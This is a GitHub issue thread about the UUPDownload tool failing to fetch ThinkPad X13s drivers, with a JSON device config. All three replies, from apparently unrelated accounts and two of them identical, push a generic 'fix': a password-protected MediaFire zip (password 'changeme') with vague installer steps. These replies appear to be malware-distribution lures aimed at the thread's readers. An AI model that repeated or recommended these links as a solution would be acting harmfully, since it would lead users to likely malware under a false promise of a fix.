### ISSUE TITLE
UUPDownload fails to download drivers for Lenovo/X13s

### ISSUE THREAD

**Issue by lumag** [WOA-Project/Qualcomm-Reference-Drivers#8]
I tried using the UUPDownload tool to get drivers for Lenovo/X13s. However my attempts to get the updates fail unless I add the HWID-11 GUID  (Manufacturer + Family). Without this setting I couldn't get it to even start downloading anything (with the enforced GUID the tool still crashes as in #7 .

For the reference:

```json
[
  {
    "outputFolder": "\\LENOVO",
    "comment": "Manufacturer + Family / 11",
    "guid": "{f249803d-0d95-54f3-a28f-f26c14a03f3b}",
    "filteredIds": [],
    "excludedIds": [],
    "Manufacturer": "LENOVO",
    "Family": "ThinkPad X13s Gen 1",
    "Product": "21BXCTO1WW",
    "Sku": "LENOVO_MT_21BX_BU_Think_FM_ThinkPad X13s Gen 1"
  }
]

```

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
